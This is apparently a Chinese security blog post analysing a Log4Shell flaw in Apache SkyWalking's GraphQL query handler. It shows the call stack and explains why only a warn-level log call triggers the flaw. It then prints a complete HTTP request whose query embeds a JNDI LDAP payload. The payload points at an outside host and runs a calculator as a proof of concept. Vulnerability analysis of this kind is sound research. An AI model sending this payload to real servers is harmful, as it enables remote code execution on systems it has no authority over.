漏洞分析 | Apache Skywalking的log4shell分析
漏洞分析 | Apache Skywalking的log4shell分析
原创 杂七 杂七杂八聊安全 2025-04-15 00:02
朋友们,现在只对常读和星标的公众号才展示大图推送,建议大家把
杂七杂八聊安全“
设为星标”,
否则可能就看不到了啦~
0x01触发点位置
graphql.GraphQL#parseAndValidate
调用堆栈:
parseAndValidate:504, GraphQL (graphql)
lambda$parseValidateAndExecute$3:494, GraphQL (graphql)
apply:-1, 981677561 (graphql.GraphQL$$Lambda$140)
get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed)
parseValidateAndExecute:490, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:763, ServletHolder (org.eclipse.jetty.servlet)
doHandle:551, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:489, ServletHandler (org.eclipse.jetty.servlet)
nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1278, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:127, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:500, Server (org.eclipse.jetty.server)
lambda$handle$1:383, HttpChannel (org.eclipse.jetty.server)
dispatch:-1, 1312317880 (org.eclipse.jetty.server.HttpChannel$$Lambda$137)
dispatch:547, HttpChannel (org.eclipse.jetty.server)
handle:375, HttpChannel (org.eclipse.jetty.server)
onFillable:273, HttpConnection (org.eclipse.jetty.server)
succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:103, FillInterest (org.eclipse.jetty.io)
run:117, ChannelEndPoint$2 (org.eclipse.jetty.io)
runTask:336, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
doProduce:313, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
tryProduce:171, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
run:129, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
run:375, ReservedThreadExecutor$ReservedThread (org.eclipse.jetty.util.thread)
runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread)
run:745, Thread (java.lang)
0x02为什么只有这个点能触发
在org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled方法中需要判断日志等级,只有上述那个点是log.warn
其他的点是LOGGER.debug,当进入到org.apache.logging.log4j.core.Logger.PrivateConfig#filter方法中,在配置文件中要求的是info级别400,这里传进来的是debug级别为500,400小于500所以返回false
在org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled中就没有进入到org.apache.logging.log4j.spi.AbstractLogger#logMessage中
0x03 数据包
POST /graphql HTTP/1.1
Host: 127.0.0.1:12800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 444
Origin: http://x.x.x.x:8059
DNT: 1
Connection: close
Referer: http://x.x.x.x:8059/
{
"query":"query queryLogs($condition: LogQueryCondition) {
queryLogs(condition: $condition) {
total
logs {
serviceId
${jndi:ldap://192.168.22.33:1389/basic/base64/b3BlbiAtYSBDYWxjdWxhdG9yCg==}
serviceName
isError
content
}
}
}
",
"variables":{
"condition":{
"metricName":"test",
"state":"ALL",
"paging":{
"pageSize":10
}
}
}
}
END
往期经典回顾
ServerStatusDiffInterceptor反序列化
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!! |
点赞
是鼓励
在看
是认同
分享
是
传递知识
看完点个
“在看”
分享给更多人